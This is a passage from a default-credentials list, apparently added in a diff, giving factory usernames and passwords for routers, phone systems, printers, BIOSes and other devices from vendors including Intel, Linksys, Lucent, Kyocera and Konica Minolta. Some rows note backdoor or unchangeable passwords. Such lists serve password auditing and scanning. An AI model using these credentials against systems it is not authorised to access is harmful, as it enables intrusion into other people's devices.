on each boot with a hardcoded algorithm and the password cannot be permanently changed - once discovered it will always work after the device is rebooted, +innovaphone,IP20,,Admin,admin,ip20,,, +innovaphone,IP20,,Multi,admin,ip20,Admin,, +innovaphone,IP3000,,Admin,admin,ip3000,,, +innovaphone,IP3000,,Multi,admin,ip3000,Admin,, +innovaphone,IP305,,,admin,ip305Beheer,,, +innovaphone,IP400,,Admin,admin,ip400,,, +innovaphone,IP400,,Multi,admin,ip400,Admin,, +integraltechnologies,RemoteView,4,Console,Administrator,letmein,Admin,, +integratednetworks,IP Phone,IN1002,HTTP,Administrator,1234,Admin,, +integratednetworks,IP Phone,IN1002,HTTP,Administrator,12345678,Admin,, +integratednetworks,IP Phone,IN1002,HTTP,Administrator,19750407,Admin,, +intel,Express 520T Switch,,,setup,setup,,, +intel,Express 520T Switch,,Multi,setup,setup,User,, +intel,Express 520T Switch,,User,setup,setup,,, +intel,Express 9520 Router,,,NICONEX,NICONEX,,, +intel,Express 9520 Router,,Multi,NICONEX,NICONEX,User,, +intel,Express 9520 Router,,User,NICONEX,NICONEX,,, +intel,LanRover VPN Gateway,,6.0 >,,shiva,,, +intel,LanRover VPN Gateway,,< 6.0,,isolation,,, +intel,LanRover VPN Gateway,6.0+,multi,,shiva,Admin,, +intel,LanRover VPN Gateway,below 6.0,multi,,isolation,Admin,, +intel,LanRover,6.7,Console,root,admin,Admin,, +intel,NetporrExpress,,,,,,, +intel,NetporrExpress,,Admin,,,,, +intel,Netstructure,480t,Telnet,admin,,Admin,, +intel,Shiva Access Port,All,Telnet,admin,hello,Admin,, +intel,Shiva LanRover,,,Guest,,User,, +intel,Shiva LanRover,,Multi,root,,Admin,, +intel,Shiva Lanrovers,,,root,,,, +intel,Shiva Lanrovers,,Admin,root,,,, +intel,Shiva Mezza ISDN Router,All,Telnet,admin,hello,Admin,, +intel,Shiva,,,Guest,,,, +intel,Shiva,,,root,,,, +intel,Shiva,,Admin,root,,,, +intel,Shiva,,Multi,Guest,,User,, +intel,Shiva,,User,Guest,,,, +intel,Wireless AP 2011,,2.21,,Intel,,, +intel,Wireless AP 2011,,Admin,,Intel,,, +intel,Wireless AP 2011,2.21,Multi,,Intel,Admin,, +intel,Wireless Gateway,,3.x,intel,intel,,, +intel,Wireless Gateway,,Admin,intel,intel,,, +intel,Wireless Gateway,3.x,HTTP,intel,intel,Admin,, +intel,intel,,,khan,kahn,,, +intel,intel,1,Multi,khan,kahn,,, +intel,lan rover,,6.7,root,admin,,, +intel,lan rover,,Admin,root,admin,,, +intel,netstructure,,480t,admin,,,, +intel,netstructure,,Admin,admin,,,, +intellitouch,ITC3002 VoIP Telephone Deskset,,HTTP/phone,administrator,1234,Admin,, +interbase,Interbase Database Server,,Admin,SYSDBA,masterkey,,, +interbase,Interbase Database Server,,All,SYSDBA,masterkey,,, +interbase,Interbase Database Server,All,Multi,SYSDBA,masterkey,Admin,, +intermec,EasyLAN,,10i2,,intermec,,, +intermec,EasyLAN,10i2,HTTP,,intermec,Admin,, +intermec,Mobile LAN,5.25,Multi,intermec,intermec,Admin,, +intermec,PF2i,,Multi,admin,pass,Admin,, +internetarchive,Heritrix,1.6.0,,admin,letmein,Admin,, +intershop,Intershop,,4,operator,$chwarzepumpe,,, +intershop,Intershop,,Admin,operator,$chwarzepumpe,,, +intershop,Intershop,4,HTTP,operator,$chwarzepumpe,Admin,, +intersystems,Cache Post-RDMS,,Console,system,sys,Admin,Change immediately, +intex,organizer,,,,,,, +intex,organizer,,Admin,,,,, +intex,organizer,,Multi,,,Admin,, +intuit,Quickbooks,,1.0,admin,(no-default-password),,, +intuit,Quickbooks,,2.0,admin,(no-default-password),,, +intuit,Quickbooks,,2004,admin,(no-default-password),,, +intuit,Quickbooks,,2005,admin,(no-default-password),,, +intuit,Quickbooks,,2006,admin,(no-default-password),,, +intuit,Quickbooks,,2007,admin,(no-default-password),,, +intuit,Quickbooks,,2008,admin,(no-default-password),,, +intuit,Quickbooks,,2009,admin,(no-default-password),,, +intuit,Quickbooks,,2010,admin,(no-default-password),,, +intuit,Quickbooks,,2011,admin,(no-default-password),,, +intuit,Quickbooks,,3.0,admin,(no-default-password),,, +intuit,Quickbooks,,4.0,admin,(no-default-password),,, +intuit,Quickbooks,,5.0,admin,(no-default-password),,, +intuit,Quickbooks,,6.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 1.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 10.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 11.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 4.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 5.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 6.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 7.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 8.0,admin,(no-default-password),,, +intuit,Quickbooks,,Enterprise 9.0,admin,(no-default-password),,, +inventelwanadoo,LiveBox,D34A,,Admin,Admin,Admin,, +ipstar,iPSTAR Network Box,v.2+,HTTP,admin,operator,Admin,iPSTAR Network Box is used by the CSLoxInfo Broadband Satellite system., +ipstar,iPSTAR Satellite Router/Radio,v2,HTTP,admin,operator,Admin,For CSLoxInfo and iPSTAR Customers, +ipswitch,WS_FTP Server,,,XXSESS_MGRYY,X#1833,,, +ipswitch,WS_FTP Server,,,XXSESS_MGRYY,X#1833,Admin,User's realname: Local Session Manager, +ipswitch,Whats up Gold 6.0,,,admin,admin,,Windows 9x a, +irc,IRC Daemon,,,,FOOBAR,,, +irc,IRC Daemon,,IRC,,FOOBAR,,, +ironport,C30,,,admin,ironport,,, +ironport,C30,,http,admin,ironport,Admin,, +ironport,Messaging Gateway Appliance,,Multi,admin,ironport,Admin,, +ironport,S650,,https,admin,ironport,,, +iso sistemi,winwork,,,,,,, +iso sistemi,winwork,,Admin,,,,, +iwill,PC BIOS,,,,iwill,,, +iwill,PC BIOS,,Admin,,iwill,,, +iwill,PC BIOS,,Console,,iwill,Admin,, +jaht,adsl router,AR41/2A,HTTP,admin,epicrouter,Admin,, +jd edwards,WorldVision/OneWorld,,Admin/SECOFR,JDE,JDE,,, +jd edwards,WorldVision/OneWorld,,All(?),JDE,JDE,,, +jdedwards,WorldVision/OneWorld,,Multi,PRODDTA,PRODDTA,Admin,Owner of database tables and objects, +jdedwards,WorldVision/OneWorld,All(?),Console,JDE,JDE,Admin/SECOFR,, +jdedwards,WorldVision/OneWorld,All(?),TCP 1964,JDE,JDE,Admin/SECOFR,, +jds microprocessing,Hydra 3000,,Admin,hydrasna,,,, +jds microprocessing,Hydra 3000,,r2.02,hydrasna,,,, +jdsmicroprocessing,Hydra 3000,r2.02,Console,hydrasna,,Admin,, +jetform,Jetform Design,,,Jetform,,,, +jetform,Jetform Design,,Admin,Jetform,,,, +jetform,Jetform Design,,HTTP,Jetform,,Admin,, +jetway,PC BIOS,,,,spooml,,, +jetway,PC BIOS,,Admin,,spooml,,, +jetway,PC BIOS,,Console,,spooml,Admin,, +johnson controls,HVAC System,,,johnson,control,,, +johnsoncontrols,HVAC System,,modem,johnson,control,,, +joss technology,PC BIOS,,,,57gbzb,,, +joss technology,PC BIOS,,,,technolgi,,, +joss technology,PC BIOS,,Admin,,57gbzb,,, +joss technology,PC BIOS,,Admin,,technolgi,,, +josstechnology,PC BIOS,,Console,,57gbzb,Admin,, +josstechnology,PC BIOS,,Console,,technolgi,Admin,, +juniper,All,,,root,,,Junos 4.4, +juniper,CMS,All versions,https,root,juniper,admin access,, +juniper,ISG2000,,Multi,netscreen,netscreen,Admin,Just a note - netscreen is now made by Juniper - otherwise no change, +juniper,Peribit,,,admin,peribit,Admin,, +juniper,ScreenOS,All,ssh or http,netscreen,netscreen,admin,, +juniper,all mode,7.6R1.9,http://118.98.171.65,,,root,administrator juniper, +justin hagstrom,AutoIndex,,1.3.2,admin,admin,,, +justin hagstrom,AutoIndex,,1.3.2,test,test,,, +justinhagstrom,AutoIndex,1.3.2,,admin,admin,Admin,, +justinhagstrom,AutoIndex,1.3.2,,test,test,,, +kalatel,Calibur DSR-2000e,,Multi,,3477,Admin,, +kalatel,Calibur DSR-2000e,,on-screen menu system,,8111,restore factory defaults,, +kaptest,usmle,,,admin,,,, +kaptest,usmle,,Admin,admin,,,, +kaptest,usmle,,HTTP,admin,,Admin,, +kethinov,Kboard Forum,,0.3.x,root,password,,, +kethinov,Kboard Forum,0.3.x,SQL,root,password,Admin,, +keyscan,Keyscan System V,,admin,keyscan,KEYSCAN,,, +keyscan,Keyscan System V,5.2,Console,keyscan,KEYSCAN,admin,, +konica minolta,7255,,admin,,sysadm,,, +konicaminolta,1690MF,1.0,web,,sysAdmin,root,, +konicaminolta,2430DL,all versions,,,administrator,administrative access,Current password listed on this site is wrong. Correct default password is "administrator" fully spelled out all lower case., +konicaminolta,4650,,HTTP,admin,administrator,admin,, +konicaminolta,7216,7216,http,,sysadm,Admin,, +konicaminolta,7255,,Multi,,sysadm,admin,, +konicaminolta,BIZHUB 7272 / IP-511A,Type A,IP,,sysadm,admin,, +konicaminolta,BizHUB 160(f),,HTTP,N/A,sysadm,,, +konicaminolta,Bizhub C10,,http,,MagiMFP,Admin,, +konicaminolta,Bizhub C20,,,,000000,,, +konicaminolta,C20,,http://xxx.xxx.xxx.xxx,Administrator,Administrator,from the login webpage,, +konicaminolta,C253,,Console,,12345678,admin,Tried what was listed at url and it worked on device :http://www.fixya.com/support/t888192-konica_minolta_bizbub_c253, +konicaminolta,C350,,,,00000000,,often either 00000000 or 12345678 on all KM printers, +konicaminolta,C352,,console/network,,12345678,,, +konicaminolta,Di 2010f,,HTTP,,0,Admin,Printer configuration interface, +konicaminolta,Di3510,,web,,00000000,,, +konicaminolta,Di470,,Admin Panel,,0000,admin,, +konicaminolta,Magiccolor 4690MF,all,http,,sysadm,Administrator,, +konicaminolta,Magicolor 2450,,front panel,,KM2450,,, +konicaminolta,Magicolor 2530DL,,,,administrator,,, +konicaminolta,Magicolor 5450D,All versions,HTTP,admin,,,, +konicaminolta,bizhub 163/211,bizhub 163/211,http,,sysadm,administrator,, +konicaminolta,bizhub 420,,console,,12345678,,, +konicaminolta,bizhub c203,all,all,,12345678,,, +konicaminolta,magicolor 2300 DL,,Multi,,1234,Admin,, +konicaminolta,magicolor 2430DL,All,Multi,,,Admin,Taken from reference manual for product, +kragerenergibredbnd,mozilla firefoz,802.11G - 2,4ghz,BREDBÅNDKABEL,ADMIN,,11G 2, +kti,KS-2260,,Telnet,superuser,123456,special CLI,can be disabled by renaming the regular login name to superuser, +kti,KS2260,,Console,admin,123,Admin,, +kti,KS2600,,Console,admin,123456,Admin,, +kyocera,EcoLink,,7.2,,PASSWORD,,, +kyocera,EcoLink,,Admin,,PASSWORD,,, +kyocera,EcoLink,7.2,HTTP,,PASSWORD,Admin,, +kyocera,FS- 5XXX,,http://,,admin00,,, +kyocera,FS-1020D,,HTTP,admin,,Admin,, +kyocera,FS-1020D,,HTTP,admin,admin,Admin,, +kyocera,FS-1028MFP,,http,,admin00,,, +kyocera,FS-1128MFP,,,,admin00,,, +kyocera,FS-1350DN,,http://,,admin00,,, +kyocera,FS-3920DN,,Web,,admin00,,, +kyocera,FS-4020 DN,,HTTP,/,admin00,,, +kyocera,FS-C5100DN,,http,,admin00,,, +kyocera,FS3140MFP,,Web Interface,,admin00,Administrator,, +kyocera,Intermate LAN FS Pro 10/100,K82_0371,HTTP,admin,admin,Admin,, +kyocera,KR2,,http,,read notes,,it is the last 6 characters of the mac address, +kyocera,TASKalfa 250ci,,IP,,admin00,,, +kyocera,TaskAlfa 520i,All versions,Console,5200,5200,Machine Administrator,, +kyocera,Taskalfa i300,,web-access/tray,admin00/3000,admin00/3000,admin,, +kyocera,Telnet Server IB-20/21,,,root,root,,, +kyocera,Telnet Server IB-20/21,,Admin,root,root,,, +kyocera,Telnet Server IB-20/21,,multi,root,root,Admin,, +lacie,2Big Network,,,admin,admin,admin console,, +lacie,Ethernet Big Disk,,ftp://EthernetBD,admin,admin,Big Disk Administration,, +lacie,Ethernet Disk Mini 500GB,,,admin,admin,Admin,, +lacie,Ethernet Disk Mini,all sizes,http://edmini,admin,admin,Administrator's Console,, +lacie,Ethernet Disk RAID,1.4,HTTP,admin,storage,Manager console,, +lacie,Ethernet Disk,,multi,,admin,Administrator password,, +lacie,Ethernet Disk,,multi,myuser,myuser,Default user has access to default public folder,, +lacie,lacie ethernet Disk,,,administrator,admin,,, +lancom,IL11,,Multi,,,Admin,, +lanier,5618,,,,sysadm,,, +lanier,5618,,Multi,,sysadm,,, +lanier,LD120d,,web,Administrator,password,admin,, +lanier,mpc 2500,1.,Deault ip,admin,LEAVE ME BLANK,,, +lantronics,Lantronics Terminal Server,,,,access,,, +lantronics,Lantronics Terminal Server,,Admin,,access,,, +lantronics,Lantronics Terminal Server,,Admin,,system,,, +lantronix,ETS16P,,,,,,, +lantronix,ETS16P,,Multi,,,Admin,secondary priv. password: system, +lantronix,ETS16PR,,,,,,, +lantronix,ETS32PR,,,,,,, +lantronix,ETS32PR,,Multi,,,Admin,secondary priv. password: system, +lantronix,ETS422PR,,,,,,, +lantronix,ETS422PR,,Multi,,,Admin,secondary priv. password: system, +lantronix,ETS4P,,,,,,, +lantronix,ETS4P,,Multi,,,Admin,secondary priv. password: system, +lantronix,LPS1-T Print Server,,,any,system,,j11-16, +lantronix,LSB4,,,any,system,,any, +lantronix,Lantronix Terminal,,,,lantronix,,, +lantronix,Lantronix Terminal,,Admin,,lantronix,,, +lantronix,SCS100,,,,access,,, +lantronix,SCS100,,Multi,,access,Admin,secondary priv. password: system, +lantronix,SCS1620,,,sysadmin,PASS,,, +lantronix,SCS1620,,Multi,sysadmin,PASS,Admin,9600/N/8/1 XON/XOFF, +lantronix,SCS200,,,,admin,,, +lantronix,SCS200,,Multi,,admin,Admin,secondary priv. password: system, +lantronix,SCS3200,,,login,access,,, +lantronix,SCS3200,,,login,access,Admin,secondary port settings login: root password: system, +lantronix,SCS400,,,,admin,,, +lantronix,SCS400,,Multi,,admin,Admin,secondary priv. password: system, +lantronix,SecureLinux Console Manager (SLC),,http/ssh,sysadmin,PASS,Admin,, +lantronix,Terminal Server,,TCP 7000,,access,Admin,, +lantronix,Terminal Server,,TCP 7000,,lantronix,Admin,, +latisnetwork,border guard,,Multi,,,Admin,, +leading edge,PC BIOS,,,,MASTER,,, +leading edge,PC BIOS,,Admin,,MASTER,,, +leadingedge,PC BIOS,,Console,,MASTER,Admin,, +lenel,OnGuard,,http - tcp 9999,admin,admin,Admin,, +level1,WAP_002,,,admin,admin,Administrator,, +lg,Aria iPECS,All,Console,,jannie,maintenance,dealer backdoor password, +lg,LAM200E / LAM200R,,Multi,admin,epicrouter,Admin,, +lg,LAM200E / LAM200R,,Multi,admin,epicrouter,admin,, +lg,lsp340,,,,6278,,, +lgic,Goldstream,,,LR-ISDN,LR-ISDN,,, +lgic,Goldstream,,2.5.1,LR-ISDN,LR-ISDN,,, +lgic,Goldstream,2.5.1,,LR-ISDN,LR-ISDN,,, +linksys,2700v ADSL Router,,,,epicrouter,Admin,, +linksys,ADSL Router,,2700v,,epicrouter,,, +linksys,AG 241 - ADSL2 Gateway with 4-Port Switch,,Multi,admin,admin,Admin,, +linksys,AP 1120,,Multi,,,Admin,, +linksys,BEFSR41,,,,admin,,, +linksys,BEFSR41,2,HTTP,,admin,Admin,, +linksys,BEFSR7(1) OR (4),,,blank,admin,,, +linksys,BEFSR81,,http://192.168.0.1,admin,password,Administration,, +linksys,BEFW11S4 Router,,,,admin,,, +linksys,BEFW11S4,,1,admin,,,, +linksys,BEFW11S4,,Admin,admin,,,, +linksys,BEFW11S4,1,HTTP,admin,,Admin,, +linksys,BEFW11S4,4,http://192.168.1.245,,,,, +linksys,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics,192.168.0.1/docsisdevicestatus.asp, +linksys,DSL,,,,admin,,, +linksys,DSL,,Admin,,admin,,, +linksys,DSL,,Telnet,,admin,Admin,, +linksys,E3000,,,admin,admin,,, +linksys,E3000,,192.168.1.1,admin,admin,admin,, +linksys,EF1324,,multi,admin,,,, +linksys,EF1704,,multi,admin,,,, +linksys,EFG250,,,admin,admin,,, +linksys,EFG250,2,HTTP,admin,admin,,, +linksys,EtherFast Cable/DSL ROuter,,,Administrator,admin,,, +linksys,EtherFast Cable/DSL ROuter,,Admin,Administrator,admin,,, +linksys,EtherFast Cable/DSL ROuter,,Multi,Administrator,admin,Admin,, +linksys,EtherFast Cable/DSL Router,,,admin,,,, +linksys,EtherFast Cable/DSL Router,,Admin,admin,,,, +linksys,EtherFast Cable/DSL Router,,HTTP,admin,,Admin,, +linksys,Linksys Router DSL/Cable,,,,admin,,, +linksys,Linksys Router DSL/Cable,,Admin,,admin,,, +linksys,Linksys Router DSL/Cable,,HTTP,,admin,Admin,, +linksys,PC22224,1.0,multi,admin,,Admin,, +linksys,PC22604,1.0,multi,admin,,Admin,, +linksys,PSUS4 USB Print Server,,,admin,admin,Administrator,, +linksys,RT31P2,,http://192.168.15.1,,admin,Administration,, +linksys,RT31P2-AT,,http://192.168.15.1,,admin,Administration,, +linksys,RTP300 w/2 phone ports,1,http://192.168.15.1,admin,admin,Admin,, +linksys,RTP300 w/2 phone ports,1,http://192.168.15.1,user,tivonpw,update access,use for flashing firmware, +linksys,RV0041,,http://192.168.1.1,admin,admin,Administration,, +linksys,RVS4000,,http://192.168.1.1,admin,admin,,, +linksys,SFE2000,,http,admin,,Admin,, +linksys,SFE2000,,http,l1_admin,,Admin,, +linksys,SFE2000P,,http,admin,,Admin,, +linksys,SFE2000P,,http,l1_admin,,Admin,, +linksys,SGE2000,,http,admin,,Admin,, +linksys,SGE2000,,http,l1_admin,,Admin,, +linksys,SGE2000P,,http,admin,,Admin,, +linksys,SGE2000P,,http,l1_admin,,Admin,, +linksys,SPA400,,http,Admin,,Admin,, +linksys,SPA9000,,http,Admin,,Admin,, +linksys,SRW2008,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2008MP,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2008P,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2016,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2024,,http://192.168.1.254,admin,,Admin,, +linksys,SRW2048,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208G,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208L,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208MP,,http://192.168.1.254,admin,,Admin,, +linksys,SRW208P,,http://192.168.1.254,admin,,Admin,, +linksys,SRW224,,http://192.168.1.254,admin,,Admin,, +linksys,SRW224G4,,http://192.168.1.254,admin,,Admin,, +linksys,SRW248G4,,http://192.168.1.254,admin,,Admin,, +linksys,SVR200,,,(AA Admin number),4x98,Autoattendant,, +linksys,SVR200,,,(AA Admin number),4x99,Autoattendant,, +linksys,SVR200,,,(username),3+(extension),User Access,, +linksys,SVR200,,,,3450,Operator voicemailbox,, +linksys,SVR200,,,,498,Autoattendant,, +linksys,SVR3000,,,(AA Admin number),4x98,Autoattendant,, +linksys,SVR3000,,,(AA Admin number),4x99,Autoattendant,, +linksys,SVR3000,,,(username),3+(extension),User Access,, +linksys,SVR3000,,,,3450,Operator voicemailbox,, +linksys,SVR3000,,,,498,Autoattendant,, +linksys,SVR3500,,,(AA Admin number),4x98,Autoattendant,, +linksys,SVR3500,,,(AA Admin number),4x99,Autoattendant,, +linksys,SVR3500,,,(username),3+(extension),User Access,, +linksys,SVR3500,,,,3450,Operator voicemailbox,, +linksys,SVR3500,,,,498,Autoattendant,, +linksys,WAG54G,,HTTP,admin,admin,Admin,, +linksys,WAG54GS,,Multi,admin,admin,Admin,, +linksys,WAP Router,,4 Port 2.4GHz,,admin,,, +linksys,WAP11,,,admin,admin,,, +linksys,WAP11,,Multi,,,Admin,, +linksys,WAP200,,http://192.168.1.245,,admin,Admin,, +linksys,WAP4400N,,http://192.168.1.245,,admin,Admin,, +linksys,WAP4400N,business series,192.168.1.245,admin,admin,admin,, +linksys,WAP44OON,2,4-GHZ,http://192.168.1.245,Admin,Admin,, +linksys,WAP51AB,,console,,Admin,Admin,, +linksys,WAP54A,,http://192.168.1.252,,admin,Web-Based Config Utility,, +linksys,WAP54G Router,,http://192.168.1.245,,admin,,, +linksys,WAP54G,,,,admin,,, +linksys,WAP54G,2,http://192.168.1.245,,admin,Admin,, +linksys,WAP54GP,,http://192.168.1.245,admin,admin,Administration,, +linksys,WAP54GPE,,http://192.168.1.245,admin,admin,Administration,, +linksys,WAP54GX,,http://192.168.1.245,admin,admin,Administration,, +linksys,WAP54GX,1.0,web ,,admin,192.168.1.245,There is no username; it will not work if you connect with a username., +linksys,WAP55AG,1.0, 2.0 ,http://192.168.1.246,,admin,, +linksys,WCG200,,http://192.168.0.1,,admin,Administration,, +linksys,WET11,,,,admin,Admin,, +linksys,WET54G,,,,admin,Admin,, +linksys,WGA11B,,,,admin,Admin,, +linksys,WMB54G,,,,admin,Admin,, +linksys,WRK54G Router,,,,admin,,, +linksys,WRT160n,V2,http://192.168.1.1,admin,admin,admin,, +linksys,WRT300N,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54G Router,,,,admin,,, +linksys,WRT54G v4,2.4,http:192.168.1.245,,admin,,, +linksys,WRT54G,,Admin,admin,admin,,, +linksys,WRT54G,,HTTP,admin,admin,Admin,, +linksys,WRT54G,2.4,http:192.168.1.245,,admin,,, +linksys,WRT54GC,,,admin,admin,,, +linksys,WRT54GC,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GL,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GP2,,http://192.168.15.1,,admin,Administration,, +linksys,WRT54GP2A-AT,,http://192.168.15.1,,admin,Administration,, +linksys,WRT54GR,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GS Router,,,,admin,,, +linksys,WRT54GS,,Admin,admin,admin,,, +linksys,WRT54GS,1.1,HTTP,admin,admin,Admin,, +linksys,WRT54GX,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GX2,,http://192.168.1.1,,admin,Administration,, +linksys,WRT54GX4,,http://192.168.1.1,,admin,Administration,, +linksys,WRT55AG Router,,,,admin,,, +linksys,WRTP54G-ER,,http://192.168.15.1,admin,admin,Admin,, +linksys,WRTSL54GS,,http://192.168.1.1,,admin,Administration,, +linksys,WRV54G,,,admin,admin,,, +linksys,WRV54G,,Multi,admin,admin,,, +linksys,WTR54GS,,http://192.168.16.1,,admin,Administration,, +linksys,wrt110,,admin,admin,admin,,, +linunx,Linux,,,Administrator,admin,,, +linux,Slackware,,,gonzo,,,, +linux,Slackware,,,satan,,,, +linux,Slackware,,,snake,,,, +linux,Slackware,,Multi,gonzo,,User,, +linux,Slackware,,Multi,satan,,User,, +linux,Slackware,,Multi,snake,,User,, +linux,Slackware,,User,gonzo,,,, +linux,Slackware,,User,satan,,,, +linux,Slackware,,User,snake,,,, +linux,UCLinux for UCSIMM,,,root,uClinux,,, +linux,UCLinux for UCSIMM,,Admin,root,uClinux,,, +linux,UCLinux for UCSIMM,,Multi,root,uClinux,Admin,, +linux,back trak,3 and 4,,root,toor,,penetration version hacking WiFi, +livingston,IRX Router,,,!root,,,, +livingston,IRX Router,,Telnet,!root,,,, +livingston,Livingston Portmaster 3,,,!root,,,, +livingston,Officerouter,,,!root,,,, +livingston,Officerouter,,,!root,blank,,, +livingston,Officerouter,,Telnet,!root,,,, +livingston,Portmaster 2R,,Telnet,root,,Admin,, +livingston,Portmaster 3,,Telnet,!root,,,, +livingston,Portmaster,2/3,,!root,blank,,, +livingstone,Portmaster 2R,,,root,,,, +livingstone,Portmaster 2R,,Admin,root,,,, +lockdownnetworks,All Lockdown Products,up to 2.7,Console,setup,changeme(exclamation),User,, +logitech,Logitech Mobile Headset,,Bluetooth,,0,audio access,, +longshine,isscfg,,HTTP,admin,0,Admin,, +lucent,AP-1000,,,public,public,,, +lucent,Anymedia,,,LUCENT01,UI-PSWD-01,,, +lucent,Anymedia,,,LUCENT02,UI-PSWD-02,,, +lucent,Anymedia,,Admin,LUCENT01,UI-PSWD-01,,, +lucent,Anymedia,,Admin,LUCENT02,UI-PSWD-02,,, +lucent,Anymedia,,Console,LUCENT01,UI-PSWD-01,Admin,requires GSI software, +lucent,Anymedia,,Console,LUCENT02,UI-PSWD-02,Admin,requires GSI software, +lucent,B-STDX9000,,,(any 3 characters),cascade,,, +lucent,B-STDX9000,,,,cascade,,, +lucent,B-STDX9000,,Multi,(any 3 characters),cascade,,, +lucent,B-STDX9000,,SNMP readwrite,,cascade,,, +lucent,B-STDX9000,,all,,cascade,,, +lucent,B-STDX9000,,debug mode,,cascade,,, +lucent,B-STDX9000,all,SNMP,,cascade,Admin,, +lucent,CBX 500,,,(any 3 characters),cascade,,, +lucent,CBX 500,,,,cascade,,, +lucent,CBX 500,,Multi,(any 3 characters),cascade,,, +lucent,CBX 500,,SNMP readwrite,,cascade,,, +lucent,CBX 500,,debug mode,,cascade,,, +lucent,Cajun Family,,,root,root,,, +lucent,Cellpipe 22A-BX-AR USB D,,Console,admin,AitbISP4eCiG,Admin,, +lucent,GX 550,,,(any 3 characters),cascade,,, +lucent,GX 550,,,,cascade,,, +lucent,GX 550,,Multi,(any 3 characters),cascade,,, +lucent,GX 550,,SNMP readwrite,,cascade,,, +lucent,GX 550,,debug mode,,cascade,,, +lucent,M770,,Telnet,super,super,Admin,, +lucent,MAX-TNT,,,admin,Ascend,,, +lucent,MAX-TNT,,Multi,admin,Ascend,,, +lucent,Max TNT,,9.1.3,,admin,,, +lucent,PSAX 1200 and below,,,root,ascend,,, +lucent,PSAX 1200 and below,,Multi,root,ascend,,, +lucent,PSAX 1250 and above,,,readonly,lucenttech2,,, +lucent,PSAX 1250 and above,,,readwrite,lucenttech1,,, +lucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,,, +lucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,Admin,, +lucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,,, +lucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,Admin,, +lucent,PacketStar,,Multi,Administrator,,Admin,, +lucent,Packetstar (PSAX),,,readwrite,lucenttech1,,, +lucent,Portmaster 2,,,!root,,,, +lucent,Portmaster 3,,,!root,!ishtar,,unknown, +lucent,Stinger,,,admin,Ascend,,, +lucent,System 75,,,bciim,bciimpw,,, +lucent,System 75,,,bcim,bcimpw,,, +lucent,System 75,,,bcms,bcmspw,,, +lucent,System 75,,,bcnas,bcnaspw,,, +lucent,System 75,,,blue,bluepw,,, +lucent,System 75,,,browse,browsepw,,, +lucent,System 75,,,browse,looker,,, +lucent,System 75,,,craft,craft,,, +lucent,System 75,,,craft,craftpw,,, +lucent,System 75,,,cust,custpw,,, +lucent,System 75,,,enquiry,enquirypw,,, +lucent,System 75,,,field,support,,, +lucent,System 75,,,inads,inads,,, +lucent,System 75,,,inads,indspw,,, +lucent,System 75,,,init,initpw,,, +lucent,System 75,,,locate,locatepw,,, +lucent,System 75,,,maint,maintpw,,, +lucent,System 75,,,maint,rwmaint,,, +lucent,System 75,,,nms,nmspw,,, +lucent,System 75,,,pw,pwpw,,, +lucent,System 75,,,rcust,rcustpw,,, +lucent,System 75,,,support,supportpw,,, +lucent,System 75,,,sysadm,sysadmpw,,, +lucent,System 75,,,tech,field,,, +lucent,System 75,,Multi,bciim,bciimpw,,, +lucent,System 75,,Multi,bcim,bcimpw,,, +lucent,System 75,,Multi,bcms,bcmspw,,, +lucent,System 75,,Multi,bcnas,bcnaspw,,, +lucent,System 75,,Multi,blue,bluepw,,, +lucent,System 75,,Multi,browse,browsepw,,, +lucent,System 75,,Multi,browse,looker,,, +lucent,System 75,,Multi,craft,craft,,, +lucent,System 75,,Multi,craft,craftpw,,, +lucent,System 75,,Multi,cust,custpw,,, +lucent,System 75,,Multi,enquiry,enquirypw,,, +lucent,System 75,,Multi,field,support,,, +lucent,System 75,,Multi,inads,inads,,, +lucent,System 75,,Multi,inads,indspw,,, +lucent,System 75,,Multi,init,initpw,,, +lucent,System 75,,Multi,locate,locatepw,,, +lucent,System 75,,Multi,maint,maintpw,,, +lucent,System 75,,Multi,maint,rwmaint,,, +lucent,System 75,,Multi,nms,nmspw,,, +lucent,System 75,,Multi,pw,pwpw,,, +lucent,System 75,,Multi,rcust,rcustpw,,, +lucent,System 75,,Multi,support,supportpw,,, +lucent,System 75,,Multi,sysadm,admpw,,, +lucent,System 75,,Multi,sysadm,sysadmpw,,, +lucent,System 75,,Multi,sysadm,syspw,,, +lucent,System 75,,Multi,tech,field,,, +luxoncommunications,IP Phone,,http,administrator,19750407,Admin,, +m technology,PC BIOS,,,,mMmM,,, +m technology,PC BIOS,,Admin,,mMmM,,, +machspeed,PC BIOS,,,,sp99dd,,, +machspeed,PC BIOS,,Admin,,sp99dd,,, +machspeed,PC BIOS,,Console,,sp99dd,Admin,, +macromedia,Dreamweaver,,,,admin,,, +macromedia,Dreamweaver,,FTP,,admin,Guest,, +macromedia,Dreamweaver,,Guest,,admin,,, +macsense,X-Router Pro,,,admin,admin,,, +magic-pro,PC BIOS,,,,prost,,, +magic-pro,PC BIOS,,Admin,,prost,,, +magicpro,PC BIOS,,Console,,prost,Admin,, +main street softworks,MCVE,,2.5,MCVEADMIN,password,,, +main street softworks,MCVE,,Admin,MCVEADMIN,password,,, +mainstreetsoftworks,MCVE,2.5,Multi,MCVEADMIN,password,Admin,, +mambo,Site Server,,4.x,admin,admin,,, +mambo,Site Server,4.x,HTTP,admin,admin,Admin,, +mantis,Mantis,,,administrator,root,,, 